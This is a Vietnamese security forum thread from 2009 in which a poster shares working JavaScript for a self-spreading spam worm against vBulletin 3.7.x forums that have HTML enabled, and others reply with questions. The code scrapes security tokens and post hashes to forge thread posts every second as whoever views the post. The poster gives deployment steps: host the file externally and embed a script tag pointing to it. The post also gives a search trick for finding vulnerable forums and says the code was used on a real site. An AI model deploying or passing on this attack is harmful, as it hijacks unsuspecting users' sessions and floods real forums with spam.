English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận bảo mật mã tự động phát tán spam nhằm vào vbb 3.7.x  XML
  [Question]   mã tự động phát tán spam nhằm vào vbb 3.7.x 11/02/2009 06:30:21 (+0700) | #1 | 168988
Icttrack
Member
[Minus]    0    [Plus]
Joined: 28/08/2007 23:18:24
Messages: 7
Offline
[Profile] [PM]
VBB không bị lỗi gì trong việc này. Lỗi là do người quản trị của diễn đàn sử dụng vbb.

Đoạn mã này sử dụng thủ thuật XSS nhưng cách thức tiến hành (thay quyền người sử dụng) thì lại theo kiểu XSRF
Cụ thể hơn với các diễn đàn sử dụng vbb phiên bản 3.7.x (mình mới chỉ kiểm nghiệm 3.7.4 và 3.7.3) nếu người quản trị bật mã HTML cho một mục nào đó thì bạn hoàn toàn có thể dùng đoạn mã bên dưới.
Do vbb tương đối công khai tình trạng các mục (box) trên diễn đàn về mã IMG, bbcode nên việc tìm kiếm các diễn đàn bị sơ xuất trong quản trị là rất đơn giản với google. Bạn chỉ cần gõ trên google với câu lệnh "mã HTML đang mở" thì có khá nhiều trang web VN nằm trong kết quả.
Đoạn mã hoàn toàn có khả năng tự nhân bản nếu bài viết nội dung lại trỏ tới chính đoạn mã bẩn


Đây là đoạn mã mình viết để nghịch chơi với các diễn đàn sử dụng vbulletin, nay chia sẻ cho các bạn
Đoạn mã này đã được mình dùng trong bài viêt về http://th6b.net/ban-luan-chung/909-xss-thay-mat-nguoi-su-dung-tiep-phan-i.th6b. Khi bạn gửi bài viết của mình vào diễn đàn không được bảo mật cẩn thận, thì bất kì ai xem đoạn mã này sẽ trở thành nạn nhân phát tán spam.
Đây là thời điểm đoạn mã mình có hiệu lực với diễn đàn http://digifuns.com/forum/index.php. Tất nhiên nay thì đã bị xoa rồi.



Thông tin chi tiết có thể xem tại đây vì đã có bạn dùng thành công
http://th6b.net/cac-phuong-phap-hay/1122-ma-spam-tu-dong-dung-de-tan-cong-dien-dan.th6b

Dưới đây là mã nguồn

Code:
var targeturl=''//dien dia chi dien dan;
var messagebody=''//dien noi dung bai gui, chu y phai thoat cac ki tu dac biet
var forumindex='2,5,6,7'//dien chi muc cua dien dan ban muon tan cong
function xmlobj() {
try {
		var http_request=new XMLHttpRequest();
	} catch(e) {
		try {
			var http_request=new ActiveXObject("Microsoft.XMLHTTP")
		} catch(e) {
			var http_request=null;
		}
}
return http_request;
}
function rand(min,max) {
	var len=Math.abs(max-min);
	return max-Math.floor(Math.random()*(len+1));
}

function mal() {
var rf=forumindex.split(",");
var rd=rand(0,rf.length-1);
if(targeturl.length==0)
	var target='newthread.php?do=newthread&f='+rf[rd]
else if(targeturl.length>0)
	var target=targeturl+'newthread.php?do=newthread&f='+rf[rd];
else 
	return false;
GET(target);
function GET(url) {
	var xml_instance=xmlobj()
	if(!xml_instance)
		return null;
	var data;
		xml_instance.open("GET",url,true);
		xml_instance.onreadystatechange=fetchvalue;
		xml_instance.send(null);

	function fetchvalue() {
		if(xml_instance.readyState==4 && xml_instance.status==200) {
			data=xml_instance.responseText
			var st,end,tok,posthash,time,subject='',message='';
			st=data.indexOf("var SECURITYTOKEN = ")+21;
			end=data.indexOf("\";",st);
			tok=data.substring(st,end);
			st=data.indexOf("\"posthash\" value=\"")+18
			end=data.indexOf("\"",st)
			posthash=data.substring(st,end);
			st=data.indexOf("\"poststarttime\" value=\"")+23;
			end=data.indexOf("\"",st)
			time=data.substring(st,end)
			for(i=0;i<=8;i++)
				subject+=String.fromCharCode(rand(65,90))
			if(messagebody.length>0)
				message=messagebody;
			else {
				for(i=0;i<=300;i++)
					message+=String.fromCharCode(rand(40,122))
			}
			POST(target,"f="+rf[rd]+"&do=postthread&loggedinuser=1&securitytoken="+tok+"&posthash="+posthash+"&poststarttime="+time+"&subject="+subject+"&message="+message)
		}
	}
}
	function POST(url,param) {
		var xml_instance=xmlobj()
		if(!xml_instance)
			return null
		xml_instance.open("POST",url,true)
		xml_instance.setRequestHeader("Content-Type","application/x-www-form-urlencoded")
		xml_instance.onreadystatechange=nothing;
		xml_instance.send(param);

		function nothing() {}
	}
}
setInterval("mal()",1000);



Bạn hãy copy đoạn mã trên vào một trình soạn thảo, lưu dưới dạng một file bất kì có đuôi là .js. Sau đó tinh chỉnh nó đi dựa theo chú thích ở trên đầu. Địa chỉ diễn đàn có lẽ không phải điền, vì quá trình truy cập diễn đàn theo đường link tương đối (relative url), thứ bạn cần chỉnh là chỉ mục của diễn đàn cần tấn công và nội dung bài spam, nếu để trống thì kí tự sẽ ngẫu nhiên.

Sau khi lưu nó xong thì hãy tải lên máy chủ lưu trữ web (web server) của các bạn rồi đánh câu sau vào nội dung bài viết của mình "<script src='http://diachiwebserver/r.js'></script> với r.js là file bạn vừa lưu. Nội dung thì tùy bạn vì đến khi bài viết hiện ra cho người khác xem, thì sẽ không có đoạn mã trên nữa. Và cứ từ đó trở đi, nếu ai vào đọc bài của bạn thì họ sẽ phát tán spam trên diễn đàn đó.
[Up] [Print Copy]
  [Question]   Re: mã tự động phát tán spam nhằm vào vbb 3.7.x 22/02/2009 10:30:44 (+0700) | #2 | 170444
DuongLD
Member
[Minus]    0    [Plus]
Joined: 31/01/2009 20:46:49
Messages: 136
Offline
[Profile] [PM]
sao toi làm hoài nó có bị gì đâu , bạn share code có sai ko vậy smilie
[Up] [Print Copy]
  [Question]   Re: mã tự động phát tán spam nhằm vào vbb 3.7.x 17/03/2009 06:35:37 (+0700) | #3 | 173443
[Avatar]
 vnkimlong
Member
[Minus]    0    [Plus]
Joined: 30/08/2007 13:53:14
Messages: 67
Offline
[Profile] [PM]
Cái này hình như viết bằng Pascal thì phải ?
[Up] [Print Copy]
  [Question]   mã tự động phát tán spam nhằm vào vbb 3.7.x 21/03/2009 23:26:44 (+0700) | #4 | 174100
bkvirus
Member
[Minus]    0    [Plus]
Joined: 19/01/2007 17:02:20
Messages: 3
Offline
[Profile] [PM]

Icttrack wrote:

Sau khi lưu nó xong thì hãy tải lên máy chủ lưu trữ web (web server) của các bạn rồi đánh câu sau vào nội dung bài viết của mình "<script src='http://diachiwebserver/r.js'></script> với r.js là file bạn vừa lưu. Nội dung thì tùy bạn vì đến khi bài viết hiện ra cho người khác xem, thì sẽ không có đoạn mã trên nữa. Và cứ từ đó trở đi, nếu ai vào đọc bài của bạn thì họ sẽ phát tán spam trên diễn đàn đó.
 

Bài viết do thành viên gởi lên sao có thể chèn tag sử dụng file *.js được ?
Hay là mã HTML ở box đó được open thì ta sẽ lợi dụng nó ?
[Up] [Print Copy]
  [Question]   mã tự động phát tán spam nhằm vào vbb 3.7.x 23/04/2009 10:35:23 (+0700) | #5 | 178165
Icttrack
Member
[Minus]    0    [Plus]
Joined: 28/08/2007 23:18:24
Messages: 7
Offline
[Profile] [PM]

bkvirus wrote:

Icttrack wrote:

Sau khi lưu nó xong thì hãy tải lên máy chủ lưu trữ web (web server) của các bạn rồi đánh câu sau vào nội dung bài viết của mình "<script src='http://diachiwebserver/r.js'></script> với r.js là file bạn vừa lưu. Nội dung thì tùy bạn vì đến khi bài viết hiện ra cho người khác xem, thì sẽ không có đoạn mã trên nữa. Và cứ từ đó trở đi, nếu ai vào đọc bài của bạn thì họ sẽ phát tán spam trên diễn đàn đó.
 

Bài viết do thành viên gởi lên sao có thể chèn tag sử dụng file *.js được ?
Hay là mã HTML ở box đó được open thì ta sẽ lợi dụng nó ?
 

Lâu lắm rồi không vào diễn đàn. Đúng như lời bạn nói đó
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|